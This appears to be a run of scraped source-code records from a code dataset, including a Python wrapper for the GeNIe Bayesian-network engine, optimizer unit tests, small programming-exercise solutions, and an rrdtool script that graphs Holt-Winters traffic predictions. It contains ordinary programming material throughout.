DSL_UTILITY\r\n\t\tNode.DECISION_NODE: 17, # DSL_LIST (=DSL_DECISION|DSL_DISCRETE)\r\n\t}\r\nclass Net:\r\n\tALG_BN_LAURITZEN, ALG_BN_HENRION, ALG_BN_PEARL, ALG_BN_LSAMPLING, \\\r\n\t\tALG_BN_SELFIMPORTANCE, ALG_BN_HEURISTICIMPORTANCE, ALG_BN_BACKSAMPLING, \\\r\n\t\tALG_BN_AISSAMPLING, ALG_BN_EPISSAMPLING, ALG_BN_LBP, ALG_BN_LAURITZEN_OLD, \\\r\n\t\tALG_BN_RELEVANCEDECOMP, ALG_BN_RELEVANCEDECOMP2, ALG_HBN_HEPIS, ALG_HBN_HLW, \\\r\n\t\tALG_HBN_HLBP, ALG_HBN_HLOGICSAMPLING = list(range(0,17))\r\n \r\ndef NYI():\r\n\tprint(\"nyi\")\r\n\t\r\nclass BNIError(Exception):\r\n\tdef __init__(self, msg):\r\n\t\tself.msg = msg\r\n\tdef __str__(self):\r\n\t\treturn self.msg\r\n\r\nclass Net(Net):\r\n\teNet = None # A pointer to the network as represented by the engine\r\n\t_autoUpdate = True\r\n\t\r\n\tdef __init__(self, fn = \"\"):\r\n\t\tself.eNet = g.new_network()\r\n\t\tif fn:\r\n\t\t\t# Just being unicode causes problems... Not sure how to\r\n\t\t\t# deal with a filename if it was genuinely unicode\r\n\t\t\tfn2 = bytes(fn, 'ascii')\r\n\t\t\tg.ReadFile(self.eNet, fn2)\r\n\t\t\tif fn.endswith(\".dne\"):\r\n\t\t\t\t# Fix up probs that GeNIe has with reading new Netica (>= V4) files\r\n\t\t\t\tcontents = open(fn).read()\r\n\t\t\t\t# Strip out strings and comments (makes scanning for keywords simpler)\r\n\t\t\t\t# Strip out strings\r\n\t\t\t\tcontents = re.sub(r'\"(\\\\\\\\|\\\\\"|[^\"])*?\"', '', contents)\r\n\t\t\t\t# Strip out comments\r\n\t\t\t\tcontents = re.sub(r'//.*', '', contents)\r\n\t\t\t\t# Scan for nodes and their CPTs\r\n\t\t\t\treg = re.compile(r'\\b(node)\\s+(\\w+)\\s*\\{|\\b(probs)\\s*=([^;]*)')\r\n\t\t\t\tstartPos = 0\r\n\t\t\t\tcurrentNode = None\r\n\t\t\t\twhile 1:\r\n\t\t\t\t\tm = reg.search(contents, startPos)\r\n\t\t\t\t\tif m:\r\n\t\t\t\t\t\tif m.group(1)==\"node\":\r\n\t\t\t\t\t\t\tcurrentNode = m.group(2)\r\n\t\t\t\t\t\telif m.group(3)==\"probs\":\r\n\t\t\t\t\t\t\tcptStr = m.group(4)\r\n\t\t\t\t\t\t\t# Flatten to 1D by splitting on commas/parentheses/spaces (any non-numeral symbol)\r\n\t\t\t\t\t\t\tcptStr = cptStr.strip(\"(), \\t\\r\\n\")\r\n\t\t\t\t\t\t\tcptStrs = re.split(r'[(),\\s]+', cptStr)\r\n\t\t\t\t\t\t\t# Convert to floats\r\n\t\t\t\t\t\t\tcpt = [float(f) for f in cptStrs]\r\n\t\t\t\t\t\t\t# Update the in-memory CPT\r\n\t\t\t\t\t\t\tself.node(currentNode).cpt1d(cpt)\r\n\t\t\t\t\t\tstartPos = m.end()\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tbreak\r\n\t\r\n\tdef __del__(self):\r\n\t\tg.delete_network(self.eNet)\r\n\t\r\n\t# This is engine dependent\r\n\tdef updateAlgorithm(self, algorithm = None):\r\n\t\tif algorithm is None:\r\n\t\t\treturn g.GetDefaultBNAlgorithm(self.eNet)\r\n\t\telse:\r\n\t\t\tg.SetDefaultBNAlgorithm(self.eNet, algorithm)\r\n\t\r\n\t# autoUpdate can be turned off for performance. You then need\r\n\t# to manually use 'update' after changes and before reading beliefs.\r\n\tdef autoUpdate(self, autoUpdate = None):\r\n\t\tif autoUpdate is None:\r\n\t\t\treturn self._autoUpdate\r\n\t\telse:\r\n\t\t\tself._autoUpdate = autoUpdate\r\n\r\n\tdef update(self):\r\n\t\tg.UpdateBeliefs(self.eNet)\r\n\t\t\r\n\tdef name(self, _name = None):\r\n\t\theader = g.net_Header(self.eNet)\r\n\t\tif _name is None:\r\n\t\t\treturn g.header_GetId(header)\r\n\t\telse:\r\n\t\t\tg.header_SetId(header, _name)\r\n\t\t\t\r\n\t\treturn self\r\n\t\t\t\r\n\tdef title(self, _title = None):\r\n\t\theader = g.net_Header(self.eNet)\r\n\t\tif _title is None:\r\n\t\t\treturn g.header_GetName(header)\r\n\t\telse:\r\n\t\t\tg.header_SetName(header, _title)\r\n\t\t\t\r\n\t\treturn self\r\n\t\t\t\r\n\tdef write(self, fn):\r\n\t\tg.WriteFile(self.eNet, fn)\r\n\t\t\r\n\tdef node(self, name):\r\n\t\tnodeId = g.FindNode(self.eNet, name)\r\n\t\tif nodeId == -2:\r\n\t\t\treturn None\r\n\t\treturn Node(net = self, genieNodeId = nodeId)\r\n\r\n\tdef addNode(self, name, nodeType = None, states = None):\r\n\t\treturn Node(self, name, nodeType = nodeType, states = states)\r\n\t\r\n\tdef compile(self):\r\n\t\t# No compile phase in GeNIe. Might do something in future.\r\n\t\tpass\r\n\t\r\n\tdef retractFindings(self):\r\n\t\tg.ClearAllEvidence(self.eNet)\r\n\t\t\r\n\tdef nodes(self):\r\n\t\tintArray = g.new_intArray()\r\n\t\tg.GetAllNodes(self.eNet, intArray)\r\n\t\tnumItems = g.intArray_NumItems(intArray)\r\n\t\titems = g.intArray_Items(intArray)\r\n\t\tnodeList = []\r\n\t\tfor i in range(numItems):\r\n\t\t\tnodeList.append(Node(self,genieNodeId=items[i]))\r\n\t\treturn nodeList\r\n\t\t\t\r\n\tdef findingsProbability(self):\r\n\t\treturn g.CalcProbEvidence(self.eNet)\r\n\r\n\t# Not sure these belong here\r\n\t@classmethod\r\n\tdef numberCombinations(cls, nodes):\r\n\t\ttotal = 1\r\n\r\n\t\tfor i in range(len(nodes)):\r\n\t\t\ttotal *= nodes[i].numberStates()\r\n\r\n\t\treturn total if len(nodes)>0 else 0\r\n\r\n\t# This function works for discrete nodes only, of course\r\n\t# nodeStates should be an array the size of len(nodes)\r\n\t@classmethod\r\n\tdef nextCombination(cls, nodeStates, nodes, skip = []):\r\n\t\t# Flip skip array (which also makes it a dict)\r\n\t\tfs = {}\r\n\t\tfor i,v in enumerate(skip): fs[v] = skip[i]\r\n\t\tskip = fs\r\n\t\t\r\n\t\tnumNodes = len(nodeStates)\r\n\t\tfor i in range(numNodes-1,-1,-1):\r\n\t\t\tif i in skip: continue\r\n\t\t\tnodeStates[i] += 1\r\n\t\t\tif nodeStates[i] >= nodes[i].numberStates():\r\n\t\t\t\t# Set the i^th node state to 0 and continue to next node\r\n\t\t\t\tnodeStates[i] = 0\r\n\t\t\telse:\r\n\t\t\t\t# More combinations to come\r\n\t\t\t\treturn True\r\n\t\t# All node states have rolled back round to 0\r\n\t\treturn False\r\n\r\n\r\nclass Node(Node):\r\n\tnet = None\r\n\teId = None # The ID (integer) of this node in GeNIe (for the given net)\r\n\t\r\n\tdef __init__(self, net = None, name = None, states = None, nodeType = None, genieNodeId = None):\r\n\t\tself.net = net\r\n\t\tself.eId = genieNodeId\r\n\t\tself._states = None\r\n\t\tself._stateNames = None\r\n\t\tself._statesLookup = None\r\n\t\tif name is not None:\r\n\t\t\tif not self.checkValidName(name):\r\n\t\t\t\traise BNIError(\"Node name \"+repr(name)+\" is not valid. Must have \" +\r\n\t\t\t\t\t\"first character as letter/underscore, \"+\r\n\t\t\t\t\t\"other characters as letter/number/underscore and max. 30 characters\")\r\n\t\t\tif nodeType is None: nodeType = Node.NATURE_NODE\r\n\t\t\tself.eId = g.AddNode(self.net.eNet, Node.NODE_TYPE_MAP[nodeType], name)\r\n\t\t\r\n\t\tif states:\r\n\t\t\tself.renameStates(states)\r\n\t\t\tfor i in range(2,len(states)):\r\n\t\t\t\tself.addState(states[i])\r\n\t\r\n\t# Some utility functions, unlikely to be useful outside\r\n\tdef _gNode(self):\r\n\t\treturn g.GetNode(self.net.eNet, self.eId)\r\n\t\r\n\tdef _gNodeDef(self):\r\n\t\tnodePtr = self._gNode()\r\n\t\treturn g.node_Definition(nodePtr)\r\n\t\r\n\tdef _gNodeVal(self):\r\n\t\treturn g.node_Value(self._gNode())\r\n\t\r\n\tdef checkValidName(self, name):\r\n\t\t# Netica convention: first character is letter/underscore,\r\n\t\t# other characters are letter/number/underscore\r\n\t\t# Max 30 characters\r\n\t\tif re.match(r'[a-zA-Z_][a-zA-Z0-9_]{,29}', name):\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\t\t\t\r\n\tdef name(self):\r\n\t\t# Not sure why it's so buried away in GeNIe\r\n\t\tmyNodePtr = g.GetNode(self.net.eNet, self.eId)\r\n\t\tnodeInfoPtr = g.node_Info(myNodePtr)\r\n\t\theaderPtr = g.nodeInfo_Header(nodeInfoPtr)\r\n\t\treturn g.header_GetId(headerPtr)\r\n\t\t\r\n\tdef title(self):\r\n\t\t# Not sure why it's so buried away in GeNIe\r\n\t\tmyNodePtr = g.GetNode(self.net.eNet, self.eId)\r\n\t\tnodeInfoPtr = g.node_Info(myNodePtr)\r\n\t\theaderPtr = g.nodeInfo_Header(nodeInfoPtr)\r\n\t\treturn g.header_GetName(headerPtr)\r\n\t\t\r\n\tdef getKind(self):\r\n\t\tNYI()\r\n\tdef parents(self):\r\n\t\tparentIds = g.GetParents(self.net.eNet, self.eId)\r\n\t\tparentIdItems = g.intArray_Items(parentIds)\r\n\t\tnumItems = g.intArray_NumItems(parentIds)\r\n\t\tparents = []\r\n\t\tfor i in range(numItems):\r\n\t\t\tparents.append(Node(self.net, genieNodeId=parentIdItems[i]))\r\n\t\treturn parents\r\n\r\n\t# Slow impl.\r\n\tdef children(self):\r\n\t\tallNodes = self.net.nodes()\r\n\t\tchildren = []\r\n\t\tfor node in allNodes:\r\n\t\t\tif self.name() in [p.name() for p in node.parents()]:\r\n\t\t\t\tchildren.append(node)\r\n\t\treturn children\t\r\n\t\t\r\n\tdef addParents(self, parents):\r\n\t\t\"\"\"\r\n\t\tEach element of parents can be an existing node name or node.\r\n\t\t\"\"\"\r\n\t\tfor parent in parents:\r\n\t\t\t# Make sure each parent is a Node object\r\n\t\t\tif isinstance(parent, str):\r\n\t\t\t\tparent = self.net.node(parent)\r\n\t\t\tg.AddArc(self.net.eNet, parent.eId, self.eId)\r\n\t\t\r\n\t\t# Allow the call chain to continue\r\n\t\treturn self\r\n\t\t\r\n\tdef addChildren(self, children):\r\n\t\t\"\"\"\r\n\t\tEach element of children can be an existing node name or node.\r\n\t\t\"\"\"\r\n\t\tfor child in children:\r\n\t\t\t# Make sure each parent is a Node object\r\n\t\t\tif isinstance(child, str):\r\n\t\t\t\tchild = self.net.node(child)\r\n\t\t\tg.AddArc(self.net.eNet, self.eId, child.eId)\r\n\r\n\t\t# Allow the call chain to continue\r\n\t\treturn self\r\n\t\r\n\tdef _clearStatesCache(self):\r\n\t\tself._stateNames = None\r\n\t\tself._statesLookup = None\r\n\t\tself._states = None\r\n\t\r\n\tdef _setupStates(self, force = False):\r\n\t\t# set 'force' or erase _stateNames to clear cache\r\n\t\tif not force and self._stateNames: return\r\n\t\t\r\n\t\tself._stateNames = self.stateNames()\r\n\t\tself._statesLookup = dict((k,State(self,i)) for i,k in enumerate(self._stateNames))\r\n\t\tself._states = []\r\n\t\tfor stateName in self._stateNames:\r\n\t\t\tself._states.append(self._statesLookup[stateName])\r\n\t\t\r\n\tdef state(self, name):\r\n\t\tself._setupStates()\r\n\t\t\r\n\t\t# If int (assumed if not str), then just get state\r\n\t\tif not isinstance(name,str):\r\n\t\t\treturn self._states[name]\r\n\t\t\r\n\t\treturn self._statesLookup[name]\r\n\t\t\r\n\tdef states(self):\r\n\t\tself._setupStates()\r\n\t\t\r\n\t\treturn self._states\r\n\t\t\r\n\tdef hasState(self, name):\r\n\t\tself._setupStates()\r\n\t\t\r\n\t\treturn name in self._statesLookup\r\n\t\r\n\tdef addState(self, name):\r\n\t\tnd = self._gNodeDef()\r\n\t\tg.nodeDefinition_AddOutcome(nd, name)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\r\n\tdef renameState(self, name, newName):\r\n\t\tnd = self._gNodeDef()\r\n\t\tstateNames = self.stateNames()\r\n\t\tstate = self.state(name)\r\n\t\tstateNames[state.stateNum] = newName\r\n\t\t\r\n\t\tstateNamesArg = (c_simplechar_p*len(stateNames))(*[bytes(s,'ascii') for s in stateNames])\r\n\t\t\r\n\t\tg.nodeDefinition_RenameOutcomes(nd, len(stateNames), stateNamesArg)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\t\r\n\tdef renameStates(self, newNames):\r\n\t\tnd = self._gNodeDef()\r\n\r\n\t\tstateNamesArg = (ctypes.c_char_p*len(newNames))(*[bytes(s,'ascii') for s in newNames])\r\n\t\t\r\n\t\tg.nodeDefinition_RenameOutcomes(nd, len(newNames), stateNamesArg)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\t\r\n\tdef setEquation(self, equationStr):\r\n\t\tnd = self._gNodeDef()\r\n\t\t\r\n\t\treturn g.equation_SetEquation(nd, equationStr)\r\n\t\t\r\n\tdef setExperience(self, parentStates, experience):\r\n\t\t# It's not clear to me GeNIe supports this\r\n\t\tNYI()\r\n\t\r\n\tdef numberStates(self):\r\n\t\tnodeDef = self._gNodeDef()\r\n\t\treturn g.nodeDefinition_GetNumberOfOutcomes(nodeDef)\r\n\t\t\r\n\tdef retractFindings(self):\r\n\t\tgNode = self._gNode()\r\n\t\tgValue = g.node_Value(gNode)\r\n\t\tg.nodeValue_ClearEvidence(gValue)\r\n\t\r\n\tdef likelihoods(self, likelihoodVector = None):\r\n\t\tif likelihoodVector is None:\r\n\t\t\tevArr = g.nodeValue_GetVirtualEvidence(self._gNodeVal())\r\n\t\t\tsize = int(evArr[0])\r\n\t\t\tretArr = []\r\n\t\t\tfor i in range(size):\r\n\t\t\t\tretArr.append(evArr[i+1])\r\n\t\t\treturn retArr\r\n\t\telse:\r\n\t\t\tfrom struct import pack\r\n\t\t\tn = len(likelihoodVector)\r\n\t\t\tdp = (ctypes.c_double*n)(*likelihoodVector)\r\n\t\t\tg.nodeValue_SetVirtualEvidence(self._gNodeVal(),\r\n\t\t\t\tlen(likelihoodVector), dp)\r\n\t\r\n\tdef finding(self, state):\r\n\t\tself.state(state).setTrueFinding()\r\n\t\t\r\n\tdef beliefs(self):\r\n\t\tif self.net._autoUpdate:\r\n\t\t\tself.net.update()\r\n\t\t\r\n\t\tgNode = self._gNode()\r\n\t\tgNodeValue = g.node_Value(gNode)\r\n\t\t#rint \"node value type:\", g.nodeValue_GetType(gNode)\r\n\t\tgMat = g.nodeValue_GetMatrix(gNodeValue)\r\n\t\t\r\n\t\tgSize = g.dMatrix_GetSize(gMat)\r\n\t\tgDbl = g.dMatrix_GetItemsDouble(gMat)\r\n\t\tbeliefs = []\r\n\t\tfor i in range(gSize):\r\n\t\t\tbeliefs.append(gDbl[i])\r\n\t\t\r\n\t\treturn beliefs\r\n\t\r\n\tdef _equationMean(self):\r\n\t\tgNode = self._gNode()\r\n\t\tgNodeValue = g.node_Value(gNode)\r\n\t\t\r\n\t\treturn g.valEqEvaluation_GetSampleMean(gNodeValue)\r\n\t\t\r\n\tdef probs(self, parentStates):\r\n\t\tNYI()\r\n\tdef stateNames(self):\r\n\t\tnodeDef = self._gNodeDef()\r\n\t\tstateNameArray = g.nodeDefinition_GetOutcomesNames(nodeDef)\r\n\t\tcharStarStar = g.stringArray_Items(stateNameArray)\r\n\t\t\r\n\t\tstateNames = []\r\n\t\tfor i in range(self.numberStates()):\r\n\t\t\tstateNames.append(charStarStar[i].value.decode('utf-8'))\r\n\t\t\t\r\n\t\treturn stateNames\r\n\t\r\n\tdef position(self, x = None, y = None):\r\n\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\tnodeInfo = g.node_Info(node)\r\n\t\tscreenInfo = g.nodeInfo_Screen(nodeInfo)\r\n\t\tposition = g.screenInfo_position(screenInfo)\r\n\t\tprint(nodeInfo, screenInfo, position)\r\n\t\tif x:\r\n\t\t\tg.rectangle_center_X_set(position, x)\r\n\t\tif y:\r\n\t\t\tg.rectangle_center_Y_set(position, y)\r\n\t\tif x is None and y is None:\r\n\t\t\treturn [g.rectangle_center_X(position), g.rectangle_center_Y(position)]\r\n\t\telse:\r\n\t\t\treturn self\r\n\r\n\tdef cpt1d(self, newCpt = None):\r\n\t\tif newCpt is None:\r\n\t\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\t\tnodeDef = g.node_Definition(node)\r\n\t\t\tnodeMat = g.nodeDefinition_GetMatrix(nodeDef)\r\n\t\t\tnumItems = g.dMatrix_GetSize(nodeMat)\r\n\r\n\t\t\tcptDbl = []\r\n\t\t\tdbArr = g.dMatrix_GetItemsDouble(nodeMat)\r\n\t\t\tfor i in range(numItems):\r\n\t\t\t\tcptDbl.append(dbArr[i])\r\n\r\n\t\t\treturn cptDbl\r\n\t\telse:\r\n\t\t\tnd = self._gNodeDef()\r\n\t\t\t\r\n\t\t\tnumStates = self.numberStates()\r\n\t\t\t\r\n\t\t\ttotalParams = len(newCpt)\r\n\t\t\trows = int(totalParams/numStates)\r\n\t\t\t\r\n\t\t\t# Normalisation\r\n\t\t\tfor r in range(rows):\r\n\t\t\t\tr *= numStates\r\n\t\t\t\ttotalRow = sum(newCpt[r:r+numStates])\r\n\t\t\t\tif totalRow:\r\n\t\t\t\t\tfor i in range(r, r+numStates):\r\n\t\t\t\t\t\tnewCpt[i] = newCpt[i]/totalRow\r\n\t\t\t\r\n\t\t\tnc = (ctypes.c_double*len(newCpt))(*newCpt)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetDoubleDefinition(nd, len(newCpt), nc)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\r\n\tdef cpt(self, newCpt = None):\r\n\t\tif newCpt is None:\r\n\t\t\tcpt1d = self.cpt1d()\r\n\t\t\tnumStates = self.numberStates()\r\n\r\n\t\t\tdef chunks(l, n):\r\n\t\t\t\treturn [l[i:i+n] for i in range(0, len(l), n)]\r\n\r\n\t\t\tcpt = chunks(cpt1d, numStates)\r\n\r\n\t\t\treturn cpt\r\n\t\telse:\r\n\t\t\tnd = self._gNodeDef()\r\n\t\t\t\r\n\t\t\tnumStates = self.numberStates()\r\n\t\t\t\r\n\t\t\ttotalParams = len(newCpt)\r\n\t\t\trows = totalParams/numStates\r\n\t\t\t\r\n\t\t\t# Normalisation\r\n\t\t\tnewCpt2 = []\r\n\t\t\tfor row in newCpt:\r\n\t\t\t\ttotalRow = sum(row)\r\n\t\t\t\tif totalRow:\r\n\t\t\t\t\tfor i in range(len(row)):\r\n\t\t\t\t\t\trow[i] = row[i]/totalRow\r\n\t\t\t\tnewCpt2.extend(row)\r\n\t\t\t\r\n\t\t\tnc = (ctypes.c_double*len(newCpt2))(*newCpt2)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetDoubleDefinition(nd, len(newCpt2), nc)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\r\n\t# Can be used with utility nodes to get/set utilities\r\n\tdef utilities(self, newUtilities = None):\r\n\t\t# Get\r\n\t\tif newUtilities is None:\r\n\t\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\t\tnodeDef = g.node_Definition(node)\r\n\t\t\tnodeMat = g.nodeDefinition_GetMatrix(nodeDef)\r\n\t\t\tnumItems = g.dMatrix_GetSize(nodeMat)\r\n\r\n\t\t\t# Utils are one dimensional (one for each parent combo)\r\n\t\t\tutilDbl = []\r\n\t\t\tdbArr = g.dMatrix_GetItemsDouble(nodeMat)\r\n\t\t\tfor i in range(numItems):\r\n\t\t\t\tutilDbl.append(dbArr[i])\r\n\r\n\t\t\treturn utilDbl\r\n\t\t# Set\r\n\t\telse:\r\n\t\t\tnd = self._gNodeDef()\r\n\t\t\tnc = (ctypes.c_double*len(newUtilities))(*newUtilities)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetDoubleDefinition(nd, len(newUtilities), nc)\r\n\t\r\n\t# For decision/utility nodes. XXX Need to add checks\r\n\tdef expectedValues(self):\r\n\t\treturn self.beliefs()\r\n\t\t\r\n\t# Can be used with decision nodes to get/set decision options\r\n\tdef options(self, newOptions = None):\r\n\t\t# Get\r\n\t\tif newOptions is None:\r\n\t\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\t\tnodeDef = g.node_Definition(node)\r\n\t\t\tstringArr = g.nodeDefinition_GetStringDefinition(nodeDef, self.numberStates())\r\n\t\t\t\r\n\t\t\tstateNames = []\r\n\t\t\tfor i in range(self.numberStates()):\r\n\t\t\t\tstateNames.append(stringArr[i])\r\n\r\n\t\t\treturn stateNames\r\n\t\t# Set\r\n\t\telse:\r\n\t\t\tnodeDef = self._gNodeDef()\r\n\t\t\tno = (ctypes.c_char_p*len(newOptions))(*newOptions)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetStringDefinition(nodeDef, len(newOptions), no)\r\n\r\nclass State:\r\n\tdef __init__(self, node = None, stateNum = None):\r\n\t\tself.node = node\r\n\t\tself.stateNum = stateNum\r\n\t\r\n\tdef name(self, _name = None):\r\n\t\tif _name is None:\r\n\t\t\tself.node._setupStates()\r\n\r\n\t\t\treturn self.node._stateNames[self.stateNum]\r\n\t\telse:\r\n\t\t\tself.node.renameState(self.stateNum, _name)\r\n\t\t\r\n\t\t\tself.node._setupStates(force = True)\r\n\r\n\tdef title(self, _title = None):\r\n\t\tNYI()\r\n\tdef setTrueFinding(self):\r\n\t\tgNode = self.node._gNode()\r\n\t\tgNodeValue = g.node_Value(gNode)\r\n\t\tg.nodeValue_SetEvidence(gNodeValue, self.stateNum)\r\n","sub_path":"bni_smile.py","file_name":"bni_smile.py","file_ext":"py","file_size_in_byte":18643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35475203","text":"###############################################################################\n#The MIT License (MIT)\n#\n#Copyright (c) 2014 Justin Lovinger\n#\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n#The above copyright notice and this permission notice shall be included in all\n#copies or substantial portions of the Software.\n#\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n###############################################################################\n\nimport copy\n\nimport pytest\n\nfrom optimal import optimize\nfrom optimal.genalg import GenAlg\n\n\ndef simple_function(binary):\n finished = binary[0] and binary[1]\n return float(binary[0])+float(binary[1])+0.001, finished\n\n\ndef test_get_hyperparameters():\n optimizer = optimize.StandardOptimizer(simple_function, 2)\n\n hyperparameters = optimizer._get_hyperparameters()\n assert hyperparameters != None\n assert hyperparameters['_population_size']\n\n\ndef test_set_hyperparameters_wrong_parameter():\n optimizer = optimize.StandardOptimizer(simple_function, 2)\n\n with pytest.raises(ValueError):\n optimizer._set_hyperparameters({'test': None})\n\n\ndef test_meta_optimize_parameter_locks():\n # Run meta optimize with locks\n # assert that locked parameters did not change\n\n # Only optimize mutation chance\n parameter_locks=['_population_size', '_crossover_chance', '_selection_function', '_crossover_function']\n\n my_genalg = GenAlg(simple_function, 2)\n original = copy.deepcopy(my_genalg)\n\n # Low smoothing for faster performance\n my_genalg.optimize_hyperparameters(parameter_locks=parameter_locks, smoothing=1)\n\n # Check that mutation chance changed\n assert my_genalg._mutation_chance != original._mutation_chance\n\n # And all others stayed the same\n for parameter in parameter_locks:\n assert getattr(my_genalg, parameter) == getattr(original, parameter)","sub_path":"optimal/tests/test_optimize.py","file_name":"test_optimize.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"291444966","text":"n = int(input())\r\nvetor = [int(i) for i in input().split()]\r\nmenor = min(vetor)\r\nposicao = 0\r\nfor i in range(len(vetor)):\r\n if vetor[i] == menor:\r\n posicao = i\r\n break\r\n\r\nprint(\"Menor valor: \" + str(menor))\r\nprint(\"Posicao: \" + str(posicao))\r\n","sub_path":"Python/URI/1180.py","file_name":"1180.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549961927","text":"import time\nimport rrdtool\nfrom path import *\n\ntitle=\"Deteccion de comportamiento anomalo, valor de Alpha 0.1\"\nendDate = rrdtool.last(rrdpath + rrdname) #ultimo valor del XML\nbegDate = endDate - 2000\n\n# tiempo_actual = int(time.time())\n# tiempo_final = tiempo_actual - 86400\n# tiempo_inicial = tiempo_final -25920000\n\n\nwhile 1 :\n rrdtool.tune(rrdpath + rrdname, '--alpha', '0.1')\n # rrdtool.tune(rrdpath + rrdname, '--window-length', '5')\n # rrdtool.tune(rrdpath + rrdname, '--failure-threshold', '3')\n ret = rrdtool.graph(pngpath + \"testNetPalphaBajoFallas.png\",\n '--start', str(begDate), \n '--end', str(endDate), \n '--title=' + title,\n '--width=1240', '--height=400',\n \"--color\",\"ARROW#009900\",\n '--vertical-label', \"Bytes/s\",\n '--border','0',\n '--rigid',\n '--slope-mode',\n\n # \"DEF:obs=\" + rrdpath + rrdname + \":inoctets:AVERAGE\",\n \"DEF:obs=\" + rrdpath + rrdname + \":outoctets:AVERAGE\",\n # \"DEF:pred=\" + rrdpath + rrdname + \":inoctets:HWPREDICT\",\n \"DEF:pred=\" + rrdpath + rrdname + \":outoctets:HWPREDICT\",\n # \"DEF:dev=\" + rrdpath + rrdname + \":inoctets:DEVPREDICT\",\n \"DEF:dev=\" + rrdpath + rrdname + \":outoctets:DEVPREDICT\",\n # \"DEF:fail=\" + rrdpath + rrdname + \":inoctets:FAILURES\",\n \"DEF:fail=\" + rrdpath + rrdname + \":outoctets:FAILURES\",\n\n #\"RRA:DEVSEASONAL:1d:0.1:2\",\n #\"RRA:DEVPREDICT:5d:5\",\n #\"RRA:FAILURES:1d:7:9:5\"\"\n \"CDEF:scaledobs=obs,8,*\",\n \"CDEF:upper=pred,dev,2,*,+\",\n \"CDEF:lower=pred,dev,2,*,-\",\n \"CDEF:scaledupper=upper,8,*\",\n \"CDEF:scaledlower=lower,8,*\",\n \"CDEF:scaledpred=pred,8,*\",\n\n \"TICK:fail#ffffa0:1.0:Failures\\\\n\",\n\n \"LINE1:scaledobs#00FF00:Average bits out\\\\n\",\n\n \"LINE3:scaledpred#FF00FF:Prediccion\\\\n\",\n #\"LINE1:outoctets#0000FF:Out traffic\",\n #\n # \"LINE1:scaledupper#ff0000:Upper Bound Average bits in\",\n \"LINE2:scaledupper#ff0000:Upper Bound Average bits out\\\\n\",\n # \"LINE1:scaledlower#0000FF:Lower Bound Average bits in\"\n \"LINE2:scaledlower#0000FF:Lower Bound Average bits out\\\\n\"\n )\n\n time.sleep(30)\n","sub_path":"6o Semestre/Aplicaciones para comunicaciones en red/Trend-Non-Linear/rrdPredGraph.py","file_name":"rrdPredGraph.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65130392","text":"\n\nfrom xai.brain.wordbase.nouns._greenhorn import _GREENHORN\n\n#calss header\nclass _GREENHORNS(_GREENHORN, ):\n\tdef __init__(self,): \n\t\t_GREENHORN.__init__(self)\n\t\tself.name = \"GREENHORNS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"greenhorn\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_greenhorns.py","file_name":"_greenhorns.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"172525915","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def pathSum(self, root: TreeNode, s: int) -> List[List[int]]:\n def dfs(node,s,ans,out):\n if not node.left and not node.right:\n if sum(ans)==s:\n out.append(list(ans))\n return\n if node.left:\n ans.append(node.left.val)\n dfs(node.left,s,ans,out)\n ans.pop()\n if node.right:\n ans.append(node.right.val)\n dfs(node.right,s,ans,out)\n ans.pop()\n if not root:\n return []\n out=[]\n ans=[root.val]\n dfs(root,s,ans,out)\n return out\n \n","sub_path":"Problem113_Path_SumII.py","file_name":"Problem113_Path_SumII.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339531988","text":"import numpy as np\nimport pandas as pd\nimport os\n\nserverPath = \"./go-server/\"\n\n## Create file load in function\ndef AddPhotoURL(fileName):\n ## load in test csv files as dataframes\n # fileName = \"top_house_reps.csv\"\n fileContent = pd.read_csv(TargetFolder + \"/\" + fileName)\n\n ## add photoURL based on https://theunitedstates.io/images/congress/450x550/O000172.jpg\n for i, row 